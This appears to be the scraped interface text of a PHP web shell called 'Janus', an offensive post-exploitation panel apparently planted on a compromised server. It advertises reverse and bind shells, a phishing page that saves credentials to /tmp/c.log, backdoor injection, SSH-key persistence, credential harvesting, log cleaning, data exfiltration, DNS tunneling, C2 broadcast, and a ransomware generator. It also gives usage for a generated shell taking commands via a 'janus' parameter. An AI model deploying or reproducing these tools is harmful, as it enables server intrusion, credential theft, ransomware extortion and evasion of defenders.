NameSizePermissionsModifiedActions
Terminal
:$
Domain Intelligence

Server Domain Reconnaissance

Automatically gather intelligence on the server's primary domain (). This includes DNS records, other websites on the same IP, and a quick scan for common subdomains.

Attack & Evasion Suite
Privilege EscalationInternal NetworkEvasionPhishing

Automated Privilege Escalation Checker

Run comprehensive checks for common privilege escalation vectors on Linux and Windows.

Internal Subnet Scanner

Scan an internal network range to discover live hosts and open ports.

Firewall Control (iptables)

View and attempt to flush firewall rules. Requires appropriate permissions.

Phishing Page Deployer

Instantly deploy a generic admin login phishing page. Credentials will be saved to /tmp/c.log on the server.

Server Fingerprint

Gather detailed information about the server's configuration, including software, services, and packages.

CMS & cPanel Tools

WordPress Admin User Creator

Finds a wp-config.php file and adds a new admin user to the database.


cPanel Symlinker

Attempt to read config files of other users on shared hosting via symbolic links.


Find cPanel Credentials

Looks for cPanel credential files like ~/.lastlogin for the current user.

Database Client (MySQLi)
Connect
Reverse ShellBind Shell

Connect Back (Reverse Shell)

The server connects out to your listener. Start with nc -lvnp 4444.

Listen for Connection (Bind Shell)

The server opens a port for you to connect to. Connect with nc [server_ip] 4444.

Pivoting

Remote Port Forwarder

Forward a port on this server to a target host and port. This is useful for accessing internal services.
Example: Listen on port 8080 here, and forward to internal database at 10.0.0.5:3306.

Note: Due to web server limitations, this forwarder will likely handle a single client connection and then terminate. Start it just before you intend to connect through it.

Network Tools

Port Scanner

PHP Code Evaluator

Output:

Mass Uploader

1. Select File to Upload

2. Select Target Directories

Loading directory tree...

3. Execute Upload

Enumeration & Privilege Escalation

Privilege Escalation Scanners

Scan results will appear here.
Scan results will appear here.


User & OS Info

Post-Exploitation Toolkit

Automated Credential Harvester

Recursively search for credentials, API keys, and private keys within a directory.


Content Search (grep)

Search for specific content inside files (e.g., find "DB_PASSWORD" in all PHP files).


Automatic Config Grabber

Automatically searches for and displays common configuration files.


Log Cleaner

Remove lines from a log file that contain a specific keyword (e.g., your IP address).

Persistence Methods

SSH Key Manager

Add your public SSH key to ~/.ssh/authorized_keys for persistent access.


.htaccess Persistence

Use an .htaccess file to automatically prepend a PHP file to all other PHP files in a directory. Place your backdoor code in the prepended file.


Code Injector / Backdoor Installer

Inject arbitrary code or a predefined mini-backdoor into one or more PHP files.

Custom InjectAuto Backdoor

Injects a simple `shell_exec` backdoor into the files listed below. One file per line.

Data Management Tools

Sensitive File Finder

Scan a directory for files containing sensitive data or with sensitive names (e.g., .sql, .pem, id_rsa).


File/Directory Change Monitor

Monitor a path for a set duration and report any created, deleted, or modified files.


Data Exfiltration Packager

Select multiple files/directories below, and this tool will create a single downloadable ZIP archive.

Loading directory tree...
Cronjob Manager

View and edit the crontab for the current user ().

Misc Tools

Wget (Downloader)


Denial of Services

Run an intensive process to consume CPU resources for a specific duration. This can be used to test server stability or create a denial of service.


Keylogger (Experimental)

Attempt to attach to a running process (like a shell) and capture read/write syscalls. Requires `strace` and appropriate permissions.


System

Real-time File Watcher

Monitor File Changes

Watch a directory for file changes in real-time. Detects created, deleted, and modified files.

Process Manager

Running Processes

View and manage running processes on the system.

PIDUserCPU %Memory %CommandActions
Network Packet Capture

Capture Network Traffic

Capture network packets using tcpdump (Linux only). Requires tcpdump and appropriate permissions.

Cryptography Tools
File EncryptionDNS Tunneling

File Encryption/Decryption

Encrypt or decrypt files using AES-256-CBC encryption.

DNS Tunneling

Send and receive data through DNS queries (covert channel).

Advanced Tools
Memory AnalysisExploit SuggesterPassword CrackerCode Obfuscator

Memory Dump Analyzer

Dump and analyze process memory (Linux only, requires gdb or /proc access).

Automated Exploit Suggester

Analyze system and suggest potential exploits based on OS, kernel, and installed software.

Password Hash Cracker

Attempt to crack password hashes using common passwords and wordlists.


Wordlist Generator

Generate wordlists from base words with patterns.

PHP Code Obfuscator

Obfuscate PHP code using various techniques to evade detection.

Notification Center

Notifications

🕷️ Web Shell Manager
Generate ShellFind Shells

Generate Lightweight Shell

Generate a lightweight PHP shell with unique identifier for easy tracking. The shell supports both GET and POST methods.

ℹ️ Identifier: Each generated shell includes a unique identifier (JANUS_SHELL_IDENTIFIER_*) that allows you to track and find all deployed shells using the "Find Shells" feature.

📖 How to Use Shell:

1. GET Method (URL):

http://yoursite.com/shell.php?janus=<command>

Examples:

  • http://yoursite.com/shell.php?janus=whoami
  • http://yoursite.com/shell.php?janus=ls -la
  • http://yoursite.com/shell.php?janus=id

2. POST Method:

Send POST request with parameter janus=<command>

Notes:

  • Default password: janus (if using a different password, change the parameter name)
  • For commands with spaces, use URL encoding: %20 for space
  • Command chaining: use ; or &&

Find Deployed Shells

Automatically search for all .php files containing the JANUS_SHELL_IDENTIFIER. This will find all shells generated by this tool.

Click "Search" to find all deployed shells

📊 Column Dumper

Dump Database Column

Extract all data from a specific column in a database table.

💾 Database Dumper

Dump Entire Database

Generate SQL dump of entire database with all tables and data.

🔓 Open BaseDir Bypass

Open BaseDir Bypass Methods

Generate PHP code to bypass open_basedir restrictions.

📧 Fake Mail

Send Fake Email

Send email with custom headers and spoofed sender address.

🔐 WHMCS Decoder

Decode WHMCS Encoded Strings

Decode base64, hex, or gzinflate encoded strings commonly used in WHMCS.

💀 Ransomware Generator
Encrypt FilesDecrypt File

File Selection

Select files to encrypt using HADES multi-layer encryption. Files will be encrypted with .hades extension.

Method 1: Select Files Directly

Click "Browse Files" to select files

Method 2: Encrypt by Extension

Encryption Settings

🔐 HADES Encryption: 13-layer encryption with AES-256-CBC (3x), XOR obfuscation, compression, and multiple encoding layers.

Decrypt File

Decrypt a file that was encrypted by HADES Ransomware Generator.

👻 Stealth & Anti-Detection
Process HidingLog Evasion

Process Hiding

Attempt to hide PHP processes from system monitoring tools.

Log Evasion

Disable logging and clear command history to avoid detection.

🧹 Advanced Log Cleaner

Clean Log Files

Remove specific keywords/IPs from multiple log files simultaneously. Automatically detects common log locations if not specified.

💾 Multi-Location Backup

Backup Shell to Multiple Locations

Create backups of your shell in multiple hidden locations for persistence. Automatically detects optimal backup locations if not specified.

📡 C2 Communication

Command & Control Server

Communicate with your C2 server for centralized command execution and data exfiltration.

🛡️ WAF Bypass Techniques

Test WAF Bypass Methods

Test various techniques to bypass Web Application Firewalls (Cloudflare, ModSecurity, etc.).

🔍 System Profiler

System Information Gathering

Gather comprehensive system information for post-exploitation analysis.

🌐 Multi-Shell Manager
Register ShellList ShellsBroadcast Command

Register New Shell

Register this shell, local shell, or remote shell (different domain) for centralized management.

Registered Shells

View all registered shell instances (local and remote).

Broadcast Command

Execute a command on all registered active shells simultaneously (local and remote).

🔐 Enhanced Persistence & Recovery

Install Persistence Mechanisms

Install multiple persistence mechanisms to ensure shell recovery after deletion.

🛡️ Defend - Shell Protection

Create .htaccess Protection

Generate .htaccess file untuk melindungi shell dari akses langsung tanpa token. File .htaccess akan dibuat di direktori shell.

ℹ️ Information:
• .htaccess akan dibuat di direktori yang sama dengan shell
• Protection akan memblokir akses GET langsung tanpa token
• POST requests tetap diizinkan untuk komunikasi shell
• Secret token akan disimpan di file .janus_secret_*
• File .htaccess TIDAK dibuat otomatis saat shell dibuka
• Anda harus mengklik tombol "Generate" untuk membuatnya